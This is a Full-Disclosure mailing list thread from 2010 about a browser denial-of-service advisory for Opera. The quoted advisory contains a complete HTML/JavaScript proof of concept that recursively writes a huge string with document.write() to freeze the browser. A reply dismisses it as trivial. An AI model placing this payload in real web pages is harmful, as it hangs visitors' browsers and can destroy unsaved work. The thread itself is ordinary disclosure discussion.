Thanks, Jeff, for all your comments. So how to fix that?

On Tue, Mar 2, 2010 at 8:42 PM, Jeff Williams <[email protected]> wrote:
> You gotta be joking, this is probably the 3000th DoS "advisory" for
> document.write.
>
> Guess what sparky, even Jeremy Brown didn't post that one.
>
> Thus no surprise exploit-db posts this kind of shit.
>
>
> 2010/3/3 information security <[email protected]>
>
>> ======================================================================
>>
>> Opera (plenitude String )Denial of Service Exploit
>>
>> =======================================================================
>>
>> by
>>
>> Asheesh Kumar Mani Tripathi
>>
>> # code by Asheesh kumar Mani Tripathi
>>
>> # email [email protected]
>>
>> # company www.aksitservices.co.in
>>
>> # Credit by Asheesh Anaconda
>>
>> #Download http://www.opera.com/download/
>>
>> #Background
>>
>> Opera is a popular internet browser :)
>>
>> #Vulnerability
>> This bug is a typical result when an attacker tries to write plenitude String in
>> document.write() function. User interaction is required to
>> exploit this vulnerability in that the target must visit a malicious
>> web page.
>>
>> #Impact
>> Browser doesn't respond any longer to any user input, all tabs are no
>> longer accessible, your work if any might be lost.
>>
>> #Proof of concept
>> copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
>>
>> ========================================================================================================================
>>
>> asheesh.html
>> ========================================================================================================================
>>
>> <html>
>>
>> <title>asheesh kumar mani tripathi</title>
>> Asheesh kumar Mani Tripathi
>> <head>
>>
>> <script>
>>
>> function asheesh ()
>> {
>> var i , anaconda = "XXXX"
>> for(i=24;i >0 ;--i)
>>
>> {
>> anaconda=anaconda+anaconda;
>> }
>>
>> document.write(anaconda);
>>
>> asheesh();
>>
>> }
>> asheesh();
>>
>> </script>
>> </head>
>>
>> <body onLoad="asheesh()"></body>
>>
>> </html>
>>
>> ========================================================================================================================
>> Why do you worry without cause? Whom do you fear without reason? Who can
>> kill you?
>>
>> The soul is neither born, nor does it die.
>>
>> #If you have any questions, comments, or concerns, feel free to contact me.
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
